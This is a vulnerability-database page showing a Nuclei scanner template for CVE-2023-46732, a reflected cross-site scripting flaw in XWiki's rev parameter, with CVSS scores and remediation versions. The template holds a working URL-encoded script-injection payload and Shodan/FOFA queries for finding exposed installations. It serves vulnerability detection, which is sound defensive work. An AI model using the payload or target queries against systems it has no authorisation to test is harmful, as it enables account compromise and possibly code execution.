Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2023-46732
HistoryJun 20, 2024 - 10:20 a.m.

XWiki < 14.10.14 - Cross-Site Scripting

2024-06-2010:20:43
ProjectDiscovery
github.com
21
cve
xwiki
cross-site scripting

CVSS3

9.6

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

AI Score

7

Confidence

High

EPSS

0.017

Percentile

88.1%

XWiki is vulnerable to reflected cross-site scripting (RXSS) via the rev parameter that is used in the content of the content menu without escaping. If an attacker can convince a user to visit a link with a crafted parameter, this allows the attacker to execute arbitrary actions in the name of the user, including remote code (Groovy) execution in the case of a user with programming right, compromising the confidentiality, integrity and availability of the whole XWiki installation.
id: CVE-2023-46732

info:
  name: XWiki < 14.10.14 - Cross-Site Scripting
  author: ritikchaddha
  severity: medium
  description: |
    XWiki is vulnerable to reflected cross-site scripting (RXSS) via the rev parameter that is used in the content of the content menu without escaping. If an attacker can convince a user to visit a link with a crafted parameter, this allows the attacker to execute arbitrary actions in the name of the user, including remote code (Groovy) execution in the case of a user with programming right, compromising the confidentiality, integrity and availability of the whole XWiki installation.
  impact: |
    Successful exploitation could lead to cross-site scripting attack.
  remediation: |
    This has been patched in XWiki 15.6 RC1, 15.5.1 and 14.10.14.
  reference:
    - https://jira.xwiki.org/browse/XWIKI-21095
    - https://nvd.nist.gov/vuln/detail/CVE-2023-46732
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-46732
    cwe-id: CWE-79
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2024,xwiki,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"
      - "{{BaseURL}}/xwiki/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "<script>alert(document.domain)</script>\" id=\"tmViewSource")'
          - 'contains(header, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100ef25fb37c01f959f49718a7988a4c20db0f2a69fd52826d8649e700c78e2c8720220128d976e934607551f8bb5b9767a1d95c97ab898a292eb1d1851c712e7fa0f3e:922c64590222798bb761d5b6d8e72950

CVSS3

9.6

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

AI Score

7

Confidence

High

EPSS

0.017

Percentile

88.1%